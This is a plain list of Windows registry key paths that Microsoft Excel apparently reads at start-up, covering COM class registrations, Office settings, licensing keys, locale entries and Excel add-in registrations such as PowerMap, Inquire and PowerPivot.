HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Office Graphics
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Office Graphics
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}
HKEY_CURRENT_USER\Software\Classes\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\(Default)
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\LocalServer
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InProcHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{529a9e6b-6587-4f23-ab9e-9c7d683e3c50}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{529a9e6b-6587-4f23-ab9e-9c7d683e3c50}\InsecureQI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\OOBE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OOBE
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\OOBE\LaunchUserOOBE
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Security\NoOleLoadFromStreamChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\CTF
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\CTF\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\CTF\EnableAnchorContext
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\CTF\EnableAnchorContext
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MOTIF\FlexUIAutomation
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\DiagnosticMode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\TeachingCallouts
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TeachingCallouts
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\PowerUI\Stats\Microsoft.Excel.Workbook
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\PowerUI\Stats\Microsoft.Excel.Workbook
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\DisableComingSoon
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\OverridePointerMode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\ActivateOnHostFlags
HKEY_CURRENT_USER\Software\Classes\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\(Default)
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\LocalServer
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InProcHandler
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Common\ResetTabletModeOverride
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\PointerModeInitVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TurnOffPhotograph
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DeveloperTools
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Signals\Stats\Anonymous\Microsoft.Excel.Workbook
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Signals\Stats\Anonymous\Microsoft.Excel.Workbook
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Signals\Stats\Anonymous\Microsoft.Excel.Workbook\ClicksData
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Feedback
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\UseMockCollabCoordinator
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\HideBuiltInTableStyles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\HideBuiltInStyles
HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Policies\0ff1ce15-a989-479d-af46-f275c6370663
HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Policies\0ff1ce15-a989-479d-af46-f275c6370663\Value
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\DeferredCheckDisabled
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\RoamingLastSyncTimeExcel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\RoamingConfigurableSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-SA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-SA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\he-IL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\he-IL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ur-PK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ur-PK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fa-IR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fa-IR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sd-Deva-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sd-Deva-IN
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Fonts\EnableApplicationFonts
HKEY_CURRENT_USER\EUDC\1252
HKEY_CURRENT_USER\EUDC
HKEY_CURRENT_USER\Software\Microsoft\Avalon.Graphics
HKEY_CURRENT_USER\Software\Microsoft\Avalon.Graphics\DISPLAY1
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\BootTimeSkuOverride
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\BootTimeSkuOverride\{C845E028-E091-442E-8202-21F596C559A0}
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\NOFPU
HKEY_LOCAL_MACHINE\Hardware\Description\System\FloatingPointProcessor
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Randomize
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\WK? Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\Line Print
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Line Print
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\EnableAltOOMError
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Delete Commands
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Init Menus
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Init Commands
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\ScriptAnchorVis
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\AddIns
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\ExcelPlugInShell.PowerMapConnect
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\ExcelPlugInShell.PowerMapConnect\LoadBehavior
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\ExcelPlugInShell.PowerMapConnect\FriendlyName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\ExcelPlugInShell.PowerMapConnect\RequireShutdownNotification
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\ExcelPlugInShell.PowerMapConnect\Manifest
HKEY_CURRENT_USER\Software\Classes\ExcelPlugInShell.PowerMapConnect\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\ExcelPlugInShell.PowerMapConnect\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\ExcelPlugInShell.PowerMapConnect\CLSID\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\ExcelPlugInShell.PowerMapConnect\Clsid
HKEY_LOCAL_MACHINE\Software\Classes\ExcelPlugInShell.PowerMapConnect\Clsid\(Default)
HKEY_CLASSES_ROOT\CLSID\{F39D01F3-69C1-45E1-93B2-7BF0BC6EB63E}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{F39D01F3-69C1-45E1-93B2-7BF0BC6EB63E}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{F39D01F3-69C1-45E1-93B2-7BF0BC6EB63E}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F39D01F3-69C1-45E1-93B2-7BF0BC6EB63E}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{F39D01F3-69C1-45E1-93B2-7BF0BC6EB63E}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{F39D01F3-69C1-45E1-93B2-7BF0BC6EB63E}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\ExcelPlugInShell.PowerMapConnect\Description
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\ExcelPlugInShell.PowerMapConnect\OverrideDefaultDisable
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\NativeShim.InquireConnector.1
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\NativeShim.InquireConnector.1\LoadBehavior
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\NativeShim.InquireConnector.1\FriendlyName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\NativeShim.InquireConnector.1\RequireShutdownNotification
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\NativeShim.InquireConnector.1\Manifest
HKEY_CURRENT_USER\Software\Classes\NativeShim.InquireConnector.1\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\NativeShim.InquireConnector.1\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\NativeShim.InquireConnector.1\CLSID\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\NativeShim.InquireConnector.1\Clsid
HKEY_LOCAL_MACHINE\Software\Classes\NativeShim.InquireConnector.1\Clsid\(Default)
HKEY_CLASSES_ROOT\CLSID\{237428F1-F2C7-4F86-B7ED-ADE148ACF95F}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{237428F1-F2C7-4F86-B7ED-ADE148ACF95F}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{237428F1-F2C7-4F86-B7ED-ADE148ACF95F}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{237428F1-F2C7-4F86-B7ED-ADE148ACF95F}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{237428F1-F2C7-4F86-B7ED-ADE148ACF95F}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{237428F1-F2C7-4F86-B7ED-ADE148ACF95F}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\NativeShim.InquireConnector.1\Description
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\NativeShim.InquireConnector.1\OverrideDefaultDisable
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\LoadBehavior
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\FriendlyName
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\RequireShutdownNotification
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\Manifest
HKEY_CURRENT_USER\Software\Classes\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\CLSID\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\Clsid
HKEY_LOCAL_MACHINE\Software\Classes\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\Clsid\(Default)
HKEY_CLASSES_ROOT\CLSID\{509E7382-B849-49A4-8A3F-BEAB7E7D904C}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{509E7382-B849-49A4-8A3F-BEAB7E7D904C}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{509E7382-B849-49A4-8A3F-BEAB7E7D904C}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{509E7382-B849-49A4-8A3F-BEAB7E7D904C}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{509E7382-B849-49A4-8A3F-BEAB7E7D904C}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{509E7382-B849-49A4-8A3F-BEAB7E7D904C}\InprocServer32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\Description
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\OverrideDefaultDisable
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\PowerPivotExcelClientAddIn.NativeEntry.1
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\PowerPivotExcelClientAddIn.NativeEntry.1\LoadBehavior
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\PowerPivotExcelClientAddIn.NativeEntry.1\FriendlyName
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\PowerPivotExcelClientAddIn.NativeEntry.1\RequireShutdownNotification
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\PowerPivotExcelClientAddIn.NativeEntry.1\Manifest
HKEY_CURRENT_USER\Software\Classes\PowerPivotExcelClientAddIn.NativeEntry.1\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\PowerPivotExcelClientAddIn.NativeEntry.1\Clsid
